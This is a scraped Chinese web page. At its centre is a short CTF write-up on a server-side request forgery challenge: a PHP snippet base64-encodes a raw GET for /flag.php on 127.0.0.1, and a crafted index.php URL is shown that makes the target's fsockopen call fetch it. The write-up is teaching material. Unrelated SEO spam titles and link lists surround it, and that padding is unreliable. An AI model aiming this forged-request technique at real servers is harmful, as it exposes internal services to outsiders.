当前位置: 首页 > news >正文

如网站性质为公司 请以企业备案用户体验较好的网站

如网站性质为公司 请以企业备案,用户体验较好的网站,公司logo设计生成器,东莞网站建设公司怎么做这题主要是引入ssrf这个漏洞攻击,本质上没有更深入的考察 本题是需要我们去伪造一个ssrf的请求头去绕过 题目开始给了我们信息让我们去访问index.php fsockopen函数触发ssrf fsockopen() 函数建立与指定主机和端口的 socket 连接。然后,它将传入的 bas…

这题主要是引入ssrf这个漏洞攻击,本质上没有更深入的考察

本题是需要我们去伪造一个ssrf的请求头去绕过

题目开始给了我们信息让我们去访问index.php

fsockopen函数触发ssrf

fsockopen() 函数建立与指定主机和端口的 socket 连接。然后,它将传入的 base64 编码的数据解码,并将数据写入到连接的 socket 中。

通过了解知道fsockopen函数就要清楚有考察ssrf的意思,需要往这个方向去想

之后就是利用poc构建脚本

<?php
$out = "GET /flag.php HTTP/1.1\r\n";
$out .= "Host: 127.0.0.1\r\n";
$out .= "Connection: Close\r\n\r\n";
echo base64_encode($out);
?>

得到data,host为127.0.0.1,port为80

之后就是构建url

GET /flag.php HTTP/1.1
Host: 127.0.0.1
Connection: Close

用base64加密然后构建url编码

/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

http://www.yayakq.cn/news/274920/

相关文章:

  • 重庆seo网站个人备案网站能用公司
  • wordpress收件邮箱seo产品是什么意思
  • 织梦网站制作教程淘客网站开发公司
  • 创新的福州网站建设宁波seo搜索排名优化
  • app网站开发的特点移动网站建设优势
  • 做公司网站是永久性的吗大连免费建站
  • 邢台本地网站哪个网站好
  • 青岛市专业做网站的吗crm管理系统定制
  • 网站建立服务如何在百度上开店铺
  • 百度百科网站开发工信部信息备案网站首页
  • 哪个专业学习网站建设网站优化大计
  • 网络营销策略包含哪些要素常州seo外包
  • 宁波网站建设公司怎么报价网站建设去哪找客户
  • 式网站公司建设网站注意事项
  • 有没有免费建网站模板和网站的区别
  • 济南网站建设与维护怎么做监测网站的浏览量
  • 网站被攻击 是vps问题还是dz程序网站开发什么语言好
  • 企业网站建设的公司怎样做网站排名优化
  • 湖南专业建站按效果付贿鱼泡建筑网
  • 室内设计公司免费网站小程序注册公司
  • 网站商品展示页怎么做的网页免费模板下载
  • 办公室装修效果图现代seo短视频网页入口引流在线观看网站
  • 青岛新公司网站建设推广有哪些做推送的网站
  • 石景山网站建设多少钱wordpress 阿里云 漏洞
  • 阿坝县建设局网站重庆网站开发解决方案
  • 网站文章怎么更新时间河南网站设计公司价格
  • 山西做网站哪个好网店代运营销售
  • 我想在阿里巴巴网站开店 怎么做wordpress+下载媒体库
  • 怎么去做网站建设电子网站前的市场分析
  • 自己做网站怎么维护陈铭生是什么小说